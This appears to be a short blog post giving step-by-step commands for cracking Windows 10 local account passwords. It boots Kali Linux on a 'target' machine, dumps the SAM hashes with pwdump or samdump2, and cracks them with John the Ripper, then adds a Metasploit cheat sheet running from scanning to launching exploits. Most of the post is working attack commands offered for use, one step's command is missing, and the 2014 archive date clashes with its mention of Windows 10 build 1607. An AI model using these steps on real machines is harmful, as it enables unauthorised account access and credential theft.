All posts for the month October, 2014

It appears the 1607 build of Windows 10 breaks the cracking of passwords with pwdump and samdump2.

To crack a Windows 10 Local account password in Kali Linux 2.0 you will need to mount the drive, locate the directory containing the SAM file, dump the password hashes to a file, and then crack with John the Ripper.

Restart the target Windows computer with your KALI Linux 2.0 system.  From time to time when you try to access the hard drive containing the Windows partition you may receive an error message related to the Windows hibernation file.  To avoid this, shutdown Windows at the command prompt with the command:

shutdown /s /t 0

This should prevent the hibernation file problem.  Once you are in KALI, open up FILES and select your Windows hard drive to mount it.  Open a terminal window and enter the command


to determine the path to your Windows hard drive.  Most of the time the Windows hard drive will be the last mount point in the list, normally something like /dev/sda1.  Your path will be something like /media/root/OSDisk.  Browse to your mount point/Windows/System32/config folder.  Use the follwoing command to create a dump of the Windows passwords:

pwdump SYSTEM SAM > /root/Desktop/SAM2

Then use John the Ripper to break the passwords.

john /root/Desktop/SAM2 –format=NT


For Kali Linux prior to version 2.0

Open terminal
Open drive in Computer so it will mount
mount to see location of drive
change to /Windows/System32/config folder in mount point

bkhive SYSTEM /root/hive.txt
samdump2 SAM /root/hive.txt > /root/hash.txt

john /root/hash.txt –format=nt2

service postgresql start #start the db
service metasploit start # connect metasploit to database
db_rebuild_cache #build cache for searching
db_status # check status of db
db_nmap <target IP> #add listening ports to database
hosts # shows scanned targets
services # show services on targets
search <service  name> # find a possible exploit
use exploit/<exploit name> # run the exploit
show options # for options to configure like set RHOST
check # will see if target is exploitable
exploit # to try the exploit